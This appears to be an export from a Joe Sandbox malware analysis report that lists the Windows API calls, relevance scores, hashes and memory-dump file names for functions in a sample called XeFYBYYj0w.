Opcode ID: fd4ad3156b2c566e7f532eea9e684dd0fb6188b40ce8aa559bb153d5cae883b0
Instruction ID: 2417e83342e5510eafbdf8493553e48ce287eedf089197b5809f6f4e2e4f9038
Opcode Fuzzy Hash: fd4ad3156b2c566e7f532eea9e684dd0fb6188b40ce8aa559bb153d5cae883b0
Instruction Fuzzy Hash: 06515C71208204AFDB04EF68C981EAEB7F9FF84354F50492DF595872A2DB31E945CB52

Function 00A8D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00A19837: __itow.LIBCMT ref: 00A19862
Part of subcall function 00A19837: __swprintf.LIBCMT ref: 00A198AC

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00A8D927
GetProcAddress.KERNEL32(00000000,?), ref: 00A8D9AA
GetProcAddress.KERNEL32(00000000,00000000), ref: 00A8D9C6
GetProcAddress.KERNEL32(00000000,?), ref: 00A8DA07
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00A8DA21

Part of subcall function 00A15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00A77896,?,?,00000000), ref: 00A15A2C
Part of subcall function 00A15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00A77896,?,?,00000000,?,?), ref: 00A15A50

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 5dbf1a310d1fada2a9ba5aa792014c4343cc564d1f4e5fd8e42035abc4e185a0
Instruction ID: 4358c8e65afabc117758f11e920fc6f3f4541bf68f3bdad7538b4f381a18e934
Opcode Fuzzy Hash: 5dbf1a310d1fada2a9ba5aa792014c4343cc564d1f4e5fd8e42035abc4e185a0
Instruction Fuzzy Hash: 8B513735A04209DFCB04EFA8C5849ADB7F8FF48310B148166E859AB362DB30ED85CF91

Function 00A7E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00A7E61F
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00A7E648
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00A7E687

Part of subcall function 00A19837: __itow.LIBCMT ref: 00A19862
Part of subcall function 00A19837: __swprintf.LIBCMT ref: 00A198AC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00A7E6AC
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00A7E6B4

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 509803bc3f1b8de43d24d7462ddd6cc86dfa3a11b3470a7094efc886be0b3241
Instruction ID: 0d89f74f19d1d8d131b91decd83de2b52cdf7b704d33d875cc76e1e8c37fe9e2
Opcode Fuzzy Hash: 509803bc3f1b8de43d24d7462ddd6cc86dfa3a11b3470a7094efc886be0b3241
Instruction Fuzzy Hash: BB51FC35A00105DFCB01EF64CA91AAEBBF9EF49314F1480A9E849AB361CB31ED51DF55

Function 00A9A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3888178b67e1286621bee3e8358d4e22da68ee86759beb777f6cc5ed85fed03a
Instruction ID: d57052076994c9efe67ea601fdb628ffab3a3e7931ada9d60076404e19874a60
Opcode Fuzzy Hash: 3888178b67e1286621bee3e8358d4e22da68ee86759beb777f6cc5ed85fed03a
Instruction Fuzzy Hash: 2F419235B05214AFDF10DB68DC88FA9BBE4EB19310F254267E916A72E1CB30AD41DA91

Function 00A12344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00A12357
ScreenToClient.USER32(00AD57B0,?), ref: 00A12374
GetAsyncKeyState.USER32(00000001), ref: 00A12399
GetAsyncKeyState.USER32(00000002), ref: 00A123A7

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: e9b402a165b8aef983122f20f77e7d9525ddb0ae9cf8032183e214a8b5c51f78
Instruction ID: b29126caee32004319022ad2050948c53ed66abb412f371ad4d86ac9261d1570
Opcode Fuzzy Hash: e9b402a165b8aef983122f20f77e7d9525ddb0ae9cf8032183e214a8b5c51f78
Instruction Fuzzy Hash: 2F416E39604119FFDF199F68C844BEDBB75BB45360F20431AF839962A0CB3499A4DBA1

Function 00A663AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A663E7
TranslateAcceleratorW.USER32(?,?,?), ref: 00A66433
TranslateMessage.USER32(?), ref: 00A6645C
DispatchMessageW.USER32(?), ref: 00A66466
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A66475

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 64e42e2fc9d555c61c5bf0ac990594476dc24244fd2070f058a17fa79ac0a892
Instruction ID: 0238bc4d37c192226acb81680424f13b1c7a20a0c36ea41f1a956362d41b2073
Opcode Fuzzy Hash: 64e42e2fc9d555c61c5bf0ac990594476dc24244fd2070f058a17fa79ac0a892
Instruction Fuzzy Hash: 9B31B471A01646AFDB24CFF0DD48BF67BBCAB01300F144566E426C61A1EF35988ADBA0

Function 00A68A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00A68A30
PostMessageW.USER32(?,00000201,00000001), ref: 00A68ADA
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00A68AE2
PostMessageW.USER32(?,00000202,00000000), ref: 00A68AF0
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00A68AF8

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: c4a48bb04c4d466dd1f1857b85d535b941e09b2653d991ba31c04799197b590f
Instruction ID: 9ae5f26560c9e3ae68e574d84c0ff1ad9a0694ff9742334586d9ccb025b45040
Opcode Fuzzy Hash: c4a48bb04c4d466dd1f1857b85d535b941e09b2653d991ba31c04799197b590f
Instruction Fuzzy Hash: FF31CE71600219EFDF14CFA8D94CA9E3BB9EB14315F11832AF925EA2D0CBB49954DB90

Function 00A6B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00A6B204
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00A6B221
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00A6B259
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00A6B27F
_wcsstr.LIBCMT ref: 00A6B289

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 43f17e1c4502b8c1a1e404b6482e052940f3c63293827377943a666d370d61e5
Instruction ID: 6f2a2076a6d93e1490dd4905818cf4f0a52e69779708def39d78abacdb7b222b
Opcode Fuzzy Hash: 43f17e1c4502b8c1a1e404b6482e052940f3c63293827377943a666d370d61e5
Instruction Fuzzy Hash: 74212272204240BFEB259B799C19EBF7BFCDF49720F00413AF904CA1A1EF618C8192A0

Function 00A9B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00A12612: GetWindowLongW.USER32(?,000000EB), ref: 00A12623

GetWindowLongW.USER32(?,000000F0), ref: 00A9B192
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00A9B1B7
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00A9B1CF
GetSystemMetrics.USER32(00000004), ref: 00A9B1F8
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00A80E90,00000000), ref: 00A9B216

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 7d325d78150b041139f2c7e44ffa533d8aa0ffbe403c8898b88b19fca932ffff
Instruction ID: 01614cc5d3fe8ba7ed74afa696728ae8e58b0e21e116b210eaf30e0cc386b5a6
Opcode Fuzzy Hash: 7d325d78150b041139f2c7e44ffa533d8aa0ffbe403c8898b88b19fca932ffff
Instruction Fuzzy Hash: 49218071B20255AFCF109F78AD44A6A37E4EB05321F214729F932D71E0E73098219BA0

Function 00A69307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A69320

Part of subcall function 00A17BCC: _memmove.LIBCMT ref: 00A17C06

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A69352
__itow.LIBCMT ref: 00A6936A
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A69392
__itow.LIBCMT ref: 00A693A3

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 4697b2a6770bdfa28ca6367dcf0a4858dbcb7ebd52b097d5f591ce44bc260a00
Instruction ID: 8e8616494bee54f95943969a127c1f0a9a445f49fd2e95f3e526eaf191651b16
Opcode Fuzzy Hash: 4697b2a6770bdfa28ca6367dcf0a4858dbcb7ebd52b097d5f591ce44bc260a00
Instruction Fuzzy Hash: FC21D431704208BBDB10ABA48D89EEF7BBDEB48710F045029FA05DF2D1DAB0CD569791

Function 00A85A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00A85A6E
GetForegroundWindow.USER32 ref: 00A85A85
GetDC.USER32(00000000), ref: 00A85AC1
GetPixel.GDI32(00000000,?,00000003), ref: 00A85ACD
ReleaseDC.USER32(00000000,00000003), ref: 00A85B08

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 8d994cdf11826d26d066bd7963828ca13f7730ae5ec5a51878108276bf7a94d0
Instruction ID: e7d7c4c2496d05b563451674dabc4a5699a44dffb83193aab1f95fdba5bb4670
Opcode Fuzzy Hash: 8d994cdf11826d26d066bd7963828ca13f7730ae5ec5a51878108276bf7a94d0
Instruction Fuzzy Hash: 02218435A00204AFDB14EFA5DD88A9AB7E9EF48350F14C479F909D7351CE70AD41CB90

Function 00A112F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A1134D
SelectObject.GDI32(?,00000000), ref: 00A1135C
BeginPath.GDI32(?), ref: 00A11373
SelectObject.GDI32(?,00000000), ref: 00A1139C

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 2d8323ab5bdc3689d7388da4717bcb613ef1e626fd9bac4c55741ba404fb0f3e
Instruction ID: e2b482acd5b45cccbab417764ef8337e92658e5f528327c4833e19a3039b7292
Opcode Fuzzy Hash: 2d8323ab5bdc3689d7388da4717bcb613ef1e626fd9bac4c55741ba404fb0f3e
Instruction Fuzzy Hash: 7C215930D01608EFDB10DFA5EC047AD7BA8EB00322F184227E9229A1B4D7709892EF90

Function 00A74A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00A74ABA
__beginthreadex.LIBCMT ref: 00A74AD8
MessageBoxW.USER32(?,?,?,?), ref: 00A74AED
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00A74B03
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00A74B0A

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 9b1edbba254f5e7bd43eebdb73b4872f0ee0b46d63b028b38192969e2c04268f
Instruction ID: 6f945ee23c6e170eb074849b3657d3b9715487a57e6b5834d8cf727e61e9764b
Opcode Fuzzy Hash: 9b1edbba254f5e7bd43eebdb73b4872f0ee0b46d63b028b38192969e2c04268f
Instruction Fuzzy Hash: 6C11E576A09214BFCB01CBF89C08ADB7BACAB49320F148266F919D3250DB718D0587A0

Function 00A68202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A6821E
GetLastError.KERNEL32(?,00A67CE2,?,?,?), ref: 00A68228
GetProcessHeap.KERNEL32(00000008,?,?,00A67CE2,?,?,?), ref: 00A68237
HeapAlloc.KERNEL32(00000000,?,00A67CE2,?,?,?), ref: 00A6823E
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A68255

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: c0faeb3366a0476c3f7e89b38101e0f31b4b44160adac0767ae5241b9cb2a504
Instruction ID: d0271b949fc63039451a6964e8fa4242fe79627d5625c18e28a9716ca41bc826
Opcode Fuzzy Hash: c0faeb3366a0476c3f7e89b38101e0f31b4b44160adac0767ae5241b9cb2a504
Instruction Fuzzy Hash: 8C016DB1304204BFDB208FB5DC48DAB7BBCEF8A755B60062AF919C2220DE318C41CA60

Function 00A6710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A67044,80070057,?,?,?,00A67455), ref: 00A67127
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A67044,80070057,?,?), ref: 00A67142
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A67044,80070057,?,?), ref: 00A67150
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A67044,80070057,?), ref: 00A67160
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A67044,80070057,?,?), ref: 00A6716C

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 66d54d75c45c23c43332f1104c9f16b15e25ee32d110e7ce18d74d8a2f92d7d5
Instruction ID: 8200801e2d438a3e226a84e85f37c951ae44c143b8e788b351857f644dc4c5a5
Opcode Fuzzy Hash: 66d54d75c45c23c43332f1104c9f16b15e25ee32d110e7ce18d74d8a2f92d7d5
Instruction Fuzzy Hash: 5C017CB2621204AFDB118FA4DC44AAE7BBDEB45795F144266FD04D2220DB71DD429BA0

Function 00A75244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A75260
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00A7526E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A75276
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00A75280
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A752BC

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
